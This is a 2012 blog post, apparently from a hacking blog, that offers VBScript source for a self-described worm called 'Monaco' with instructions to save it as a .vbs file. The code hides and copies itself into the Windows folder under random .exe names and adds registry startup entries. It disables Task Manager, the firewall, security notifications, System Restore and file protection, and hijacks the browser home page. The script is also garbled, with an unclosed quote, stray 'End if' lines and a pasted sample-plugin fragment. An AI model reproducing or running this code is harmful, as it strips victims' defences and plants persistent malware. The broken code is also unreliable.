Friday, 31 August 2012

New Worm Called Monaco

Recently i have been working on a worm which effects the entire registry and disable task manager. If you execute this worm , your home page will be my blog http://theethicalhackerz.blogspot.com.



Be careful do not run this worm. If you run this worm your home page will be my blog :D
Hehe...
On Error Resume Next

' monaco By 315cu1t V.
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("Wscript.Shell")

Function Hide(filename)
Set file = fso.GetFile(filename)
file.Attributes = -2
End Function
hide(WScript.ScriptFullName)
path = "C:\windows\mfxjla.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Sasaxquo", "C:\Windows\mfxjla.exe"
path = "C:\windows\zhuchj.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Saszoqor", "C:\Windows\zhuchj.exe, "REG_SZ"
path = "C:\Windows\eojyhnzad.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\eojyhnzad", path, "REG_SZ"
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

Shell.regwrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page","http://theethicalhackerz.blogspot.com", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://theethicalhackerz.blogspot.com", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
Shell.run "",false
Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD"
Shell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable","FFFFFF9D","REG_DWORD"
' Sample Plugin File
' This plugin is an example. Use it to guide you when making your own plugins

msgtitle = "Alert" ' Set The Message Box Title
msgtext = "hi there" 'Set The Message Box Text

Call MsgBox(msgtext,65,msgtitle)

' :-------:
Shell.RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictAnonymous", "1", REG_DWORD)
Shell.RegWrite("HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning", "0", "REG_DWORD")
End if
End if

Now save the file with .vbs extension.
That's it!! 

No comments:

Post a Comment